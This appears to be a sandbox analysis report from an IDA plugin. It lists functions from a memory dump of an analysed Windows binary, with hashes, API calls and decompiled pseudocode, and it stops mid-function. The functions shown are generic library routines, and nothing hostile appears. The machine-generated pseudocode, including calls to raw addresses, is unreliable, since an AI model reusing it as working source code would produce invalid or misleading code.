Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: bce5457acda44f3ab9d8c1573828862cf271ec85e9f077c93b372f12188569fa
Instruction ID: ecdceab9e9247687fe31a3c99195a9492810608e31738bda860d881686827329
Opcode Fuzzy Hash: bce5457acda44f3ab9d8c1573828862cf271ec85e9f077c93b372f12188569fa
Instruction Fuzzy Hash: BA7179B19013159BCF15EF64C881BEE7BB1FF09310F2841A9F819AB286CB749945DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E48ECB Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 00E48F23
MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,00000000,00000000), ref: 00E48F71
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000), ref: 00E48FE7
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000), ref: 00E4900F

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: 4eeedb46de3551419d5f14007171d15279463ab3fb19e483bf711278915c4767
Instruction ID: bdd4b444cfe39c7625bdde492e9d4fdc38600b3323482c0940d46be82defe20e
Opcode Fuzzy Hash: 4eeedb46de3551419d5f14007171d15279463ab3fb19e483bf711278915c4767
Instruction Fuzzy Hash: E241D131B0034AEFDB218F64E940BAEB7F6AF42318F149469F855AB181DB70AC48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E30DA9 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E30DDF
__isleadbyte_l.LIBCMT ref: 00E30E0D
MultiByteToWideChar.KERNEL32(FFFDE8BD,00000009,?,E9413CBE,?,00000000,?,00000000,00000000,?,00CAE43D,?,\VlcpVideoV1.0.1), ref: 00E30E3B
MultiByteToWideChar.KERNEL32(FFFDE8BD,00000009,?,00000001,?,00000000,?,00000000,00000000,?,00CAE43D,?,\VlcpVideoV1.0.1), ref: 00E30E71

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 38e4e5de4f31c6b44e01627f9f98ab82d46dcf74d90b801e8aae720bd19faf62
Instruction ID: 809f592e5f7f165d1df0ea8eea13322dfb9a3178e85bf2d6925b892b6584c4f8
Opcode Fuzzy Hash: 38e4e5de4f31c6b44e01627f9f98ab82d46dcf74d90b801e8aae720bd19faf62
Instruction Fuzzy Hash: 3131D031600246AFDF218E76C858BBA7FE5FF41714F155928E825B71A1E731E850DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D35A8C Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00D35A8C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16, intOrPtr _a20, signed char _a24) {
				signed int _v8;
				void* __ecx;
				void* __ebp;
				short _t30;
				intOrPtr _t32;
				char _t41;
				intOrPtr _t43;
				void* _t45;
				intOrPtr _t48;
				void* _t51;
				void* _t53;
				intOrPtr* _t56;
				signed int _t57;

				_t51 = __edx;
				_push(_t45);
				_v8 = _v8 & 0x00000000;
				_t53 = _t45;
				_t56 = E00D35087( &_v8, __eflags, 0x428);
				if(_t56 == 0) {
					L8:
					_t41 = 0;
					__eflags = 0;
					L9:
					_t57 = _v8;
					while(_t57 != 0) {
						_t57 =  *_t57;
						0xe213f4(_t57);
					}
					return _t41;
				}
				_t43 = 0x28;
				0xe23f30(_t56, 0, _t43);
				_t48 = _a16;
				 *_t56 = _t43;
				 *((intOrPtr*)(_t56 + 4)) = _a4;
				_t41 = 1;
				 *((intOrPtr*)(_t56 + 8)) = _a8;
				_t30 = _a12;
				 *((short*)(_t56 + 0xc)) = 1;
				 *((short*)(_t56 + 0xe)) = _t30;
				 *((intOrPtr*)(_t56 + 0x10)) = _t48;
				if(_t30 > 8) {
					__eflags = _t48 - 3;
					if(_t48 == 3) {
						_t15 = _t56 + 0x28; // 0x28
						0xe243cc(_t15, 0xc, _a20, 0xc);
						E00CA56F3(_t48, _t15);
					}
				} else {
					_t13 = _t56 + 0x28; // 0x28
					0xe23f30(_t13, 0, 0x400);
				}
				_t16 = _t53 + 8; // 0x8
				_t32 =  *0xe8e0fc(0, _t56, 0, _t16, 0, 0);
				if(_t32 == 0) {
					goto L8;
				} else {
					 *((intOrPtr*)(_t53 + 4)) = _t32;
					E00D39532(_t53, _t51, (0 | _a8 >= 0x00000000) + 1);
					if((_a24 & 0x00000001) != 0) {
						 *((char*)(_t53 + 0x1d)) = _t41;
					}
					goto L9;
				}
			}

0x00d35a8c
0x00d35a8f
0x00d35a90
0x00d35a97
0x00d35aa6
0x00d35aaa
0x00d35b4d
0x00d35b4d
0x00d35b4d
0x00d35b4f
0x00d35b4f
0x00d35b5d
0x00d35b55
0x00d35b57
0x00d35b5c
0x00d35b69
0x00d35b69
0x00d35ab2
0x00d35ab7
0x00d35ac2
0x00d35ac5
0x00d35ac9
0x00d35acc
0x00d35ad0
0x00d35ad3
0x00d35ad6
0x00d35ada
0x00d35ade
0x00d35ae4
0x00d35afb
0x00d35afe
0x00d35b05
0x00d35b0b
0x00d35b11
0x00d35b16
0x00d35ae6
0x00d35aeb
0x00d35af1
0x00d35af6
0x00d35b1b
0x00d35b24
0x00d35b2c
0x00000000
0x00d35b2e
0x00d35b2e
0x00d35b3d
0x00d35b46
0x00d35b48
0x00d35b48
0x00000000
0x00d35b46

APIs

Part of subcall function 00D35087: _malloc.LIBCMT ref: 00D35098

_memset.LIBCMT ref: 00D35AB7
_memset.LIBCMT ref: 00D35AF1
_memcpy_s.LIBCMT ref: 00D35B0B
_free.LIBCMT ref: 00D35B57

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memset$_free_malloc_memcpy_s
String ID:
API String ID: 1486211779-0
Opcode ID: 1b2ebf9ef5f3504accd9dce3e5891c706eef69af0f3d20461d33508f9e2f8b94
Instruction ID: 833a9d30a9c159ad78e7488cc0113d4de4c63471b122977506b5be65e0119da1
Opcode Fuzzy Hash: 1b2ebf9ef5f3504accd9dce3e5891c706eef69af0f3d20461d33508f9e2f8b94
Instruction Fuzzy Hash: DA21D5B1A10719AFD7249F65EC42FABF7A8EF05314F04452DF946D7640E674EA048BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E56F69 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E56F70
std::_Cnd_waitX.LIBCPMT ref: 00E56F90

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E56FC9
std::_Cnd_initX.LIBCPMT ref: 00E56FF1

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: 15618d519c20b78b0ebe4452139973e21964e77bdf9414b3105529c9e42bc47d
Instruction ID: 7ce1107db59fe848b1185f42f60b584c8d7e8f3318e29b8bbe176d3ea68da487
Opcode Fuzzy Hash: 15618d519c20b78b0ebe4452139973e21964e77bdf9414b3105529c9e42bc47d
Instruction Fuzzy Hash: AE017170E00214BBCB20AF28AC4279937D4AB25B19F526869FD14F7392DB31CE459B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E67D58 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E67D7E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E67D9A
__CxxThrowException@8.LIBCMT ref: 00E67DA8
CreateThread.KERNEL32(00EFA47C,?,?,?,?,?), ref: 00E67DC3

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8LastThreadThrow
String ID:
API String ID: 4022716757-0
Opcode ID: c286fccb81c0d61fd402ba465ce90db338b65b27d80d516aa81d6aedea09d25a
Instruction ID: 79813b664d9391c0e94b075ed8af51ed587f3e157d06fe1ba801c3ab98260559
Opcode Fuzzy Hash: c286fccb81c0d61fd402ba465ce90db338b65b27d80d516aa81d6aedea09d25a
Instruction Fuzzy Hash: B0F0A47118420D7BDF11AFA1EC06FBA3B69AF05354F505851FE1CA4191E671C9209792

Uniqueness

Uniqueness Score: -1.00%

Function 00D10DEA Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00D10DEA(void** _a4) {
				void* _v4;
				void* __ebp;
				void* _t3;
				void* _t4;
				int _t8;
				void* _t9;
				signed int _t12;
				void** _t14;
				void* _t15;

				_t14 = _a4;
				if(_t14 == 0) {
					_t4 = E00D0BD09(_t9);
					asm("int3");
					_push(_t14);
					_t15 = _v4;
					if(_t15 != 0) {
						_t12 = GlobalFlags(_t15) & 0x000000ff;
						if(_t12 == 0) {
							L7:
							return GlobalFree(_t15);
						} else {
							goto L6;
						}
						do {
							L6:
							GlobalUnWire(_t15);
							_t12 = _t12 - 1;
						} while (_t12 != 0);
						goto L7;
					}
					return _t4;
				} else {
					if( *_t14 != 0) {
						_t8 = DeleteObject( *_t14);
						 *_t14 =  *_t14 & 0x00000000;
						return _t8;
					}
					return _t3;
				}
			}

0x00d10dee
0x00d10df3
0x00d10e0a
0x00d10e0f
0x00d10e13
0x00d10e14
0x00d10e19
0x00d10e25
0x00d10e2b
0x00d10e37
0x00000000
0x00000000
0x00000000
0x00000000
0x00d10e2d
0x00d10e2d
0x00d10e2e
0x00d10e34
0x00d10e34
0x00000000
0x00d10e2d
0x00d10e41
0x00d10df5
0x00d10df8
0x00d10dfc
0x00d10e02
0x00000000
0x00d10e02
0x00d10e07
0x00d10e07

APIs

DeleteObject.GDI32(?), ref: 00D10DFC
GlobalFlags.KERNEL32(?), ref: 00D10E1D
GlobalUnWire.KERNEL32(?), ref: 00D10E2E
GlobalFree.KERNEL32(?), ref: 00D10E38

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Global$DeleteFlagsFreeObjectWire
String ID:
API String ID: 1221732754-0
Opcode ID: 974624adfec9de86c550e2bb5d651ecfe78b3ddc5414d6bfaea34a3d7923fead
Instruction ID: cd16822f55a55bbb59ae4fc260c1b18b9b0186ecce86445c9095c79fa08ee8f4
Opcode Fuzzy Hash: 974624adfec9de86c550e2bb5d651ecfe78b3ddc5414d6bfaea34a3d7923fead
Instruction Fuzzy Hash: AEF09032101525BBC6212B86F808BEBBBACEF51761F180825F948762109BB458C087F5

Uniqueness

Uniqueness Score: -1.00%

Function 00E793EA Relevance: 6.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 00E79408
std::exception::exception.LIBCMT ref: 00E79422
__CxxThrowException@8.LIBCMT ref: 00E79458

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8Throw__malloc_crtstd::exception::exception
String ID:
API String ID: 3183362523-0
Opcode ID: 63d81302c8416c7f132f000c1f4ff383143d7459a91598b92dc3d1c144af7fbb
Instruction ID: 5ecb02135337ffa444c9f3be829e3cfdc39f57d3d625a8e3f68d7df96799edc6
Opcode Fuzzy Hash: 63d81302c8416c7f132f000c1f4ff383143d7459a91598b92dc3d1c144af7fbb
Instruction Fuzzy Hash: D9F0627090030C7ACB10EFA4D986ADE7BF8DF10354F50E156F929BA242EB74D6498B80

Uniqueness

Uniqueness Score: -1.00%

Function 00D0F0EC Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

Part of subcall function 00D0F0C8: RtlInitializeCriticalSection.NTDLL(00F0B598), ref: 00D0F0E0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 9fa38d796dc48ce0fdc7b0e4a4ca7b5e8607cc564a7b0598e01a0aea1787e03a
Instruction ID: 0d79adc5e58b0335f2c62f52925f5285bb788a7709ffee6025b5b9ba4f44fb3e
Opcode Fuzzy Hash: 9fa38d796dc48ce0fdc7b0e4a4ca7b5e8607cc564a7b0598e01a0aea1787e03a
Instruction Fuzzy Hash: 6AF0B47260031DDFDA201F59EC49B29765CEB15365F981072F40EA25D2C7708C449BF3

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D377 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00F0B384), ref: 00D0D383
TlsGetValue.KERNEL32(00F0B368,?,?,?,?,00D0D33B,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?,?,?,00CA5C95), ref: 00D0D397
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D3AD
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D3B8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 3a6b2992091e07f7910978b95266bedf1345fd0d928ffafce713a3703a5324c7
Instruction ID: cdad27cc7c76311011b9afe1a14093dff99d5805ba4910efa90f8753ca163a5e
Opcode Fuzzy Hash: 3a6b2992091e07f7910978b95266bedf1345fd0d928ffafce713a3703a5324c7
Instruction Fuzzy Hash: 89F054722001109FCB115F99D888E6AB7BDEB957203054066E90DFB261C770FC05C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00CA241A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA247F

Strings

invalid string position, xrefs: 00CA24A3
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00CA24B5

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$invalid string position
API String ID: 4104443479-2057747007
Opcode ID: 08fe9a6e7c635af15e096f5942fe3e310a859e56ee614e70ce4bab7c68ed91ad
Instruction ID: 328f6f2b8c473a4742de69d2b9b09dff44d383957e645b53f49a9d5f28525403
Opcode Fuzzy Hash: 08fe9a6e7c635af15e096f5942fe3e310a859e56ee614e70ce4bab7c68ed91ad
Instruction Fuzzy Hash: 0C213732300336ABDF249E5CDC80E6BB7AAEB8B758B000819F85997242C770DD40D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4CB55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4CB5C
__CxxThrowException@8.LIBCMT ref: 00E4CBD4

Strings

FilterWithBufferedInput: invalid buffer size, xrefs: 00E4CBA5

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: FilterWithBufferedInput: invalid buffer size
API String ID: 2985221223-2832723189
Opcode ID: 241ed3b7d7e1e6eba7a139642c5b7ec6aee8168b79da1d8bdced35ebc142f401
Instruction ID: c02fb742e658418c76e0fcbc9b7a5ddeaf1f0d01a599a1dbe9f41ebabe1d5ec6
Opcode Fuzzy Hash: 241ed3b7d7e1e6eba7a139642c5b7ec6aee8168b79da1d8bdced35ebc142f401
Instruction Fuzzy Hash: 3621D130600218EFCB24DF54D849EA8B7F4FF08365F205559E15CAB690CB71E989CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D32A91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D32AB4
GetSysColor.USER32(00000014), ref: 00D32AFF

Strings

(, xrefs: 00D32AE3

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color_memset
String ID: (
API String ID: 3108786944-3887548279
Opcode ID: 3c39720976796db201eeaf9838cea9b4e463f729ccf6f8e7ef93885a7f79a2f7
Instruction ID: d29fcceb963cd41633250d63d1fdce84e2ec8b3b87f158d7ceaadb8eecbf2ab6
Opcode Fuzzy Hash: 3c39720976796db201eeaf9838cea9b4e463f729ccf6f8e7ef93885a7f79a2f7
Instruction Fuzzy Hash: 7621B031A5125CDFEB04DFA89C46BEDB7F8EB14300F4040AEE949EB281DA345A08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 34%

			E00CA73E5(void* __ebx, intOrPtr* __ecx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v40;
				intOrPtr _v56;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr* _v92;
				intOrPtr _v112;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				intOrPtr _t97;
				signed int _t100;
				signed int _t101;
				signed int _t103;
				signed int _t109;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t128;
				signed int _t129;
				intOrPtr* _t139;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr* _t146;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr* _t150;
				signed int _t151;
				signed int _t155;
				intOrPtr* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				intOrPtr* _t180;
				signed int _t182;
				intOrPtr* _t184;
				intOrPtr _t185;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				signed int _t201;
				intOrPtr* _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				void* _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t233;

				_t147 = __ebx;
				_t190 = _a4;
				_t212 = __ecx;
				_t88 = E00CA239B(__ecx, _t190);
				if(_t88 == 0) {
					_t161 =  *((intOrPtr*)(__ecx + 0x10));
					_push(__ebx);
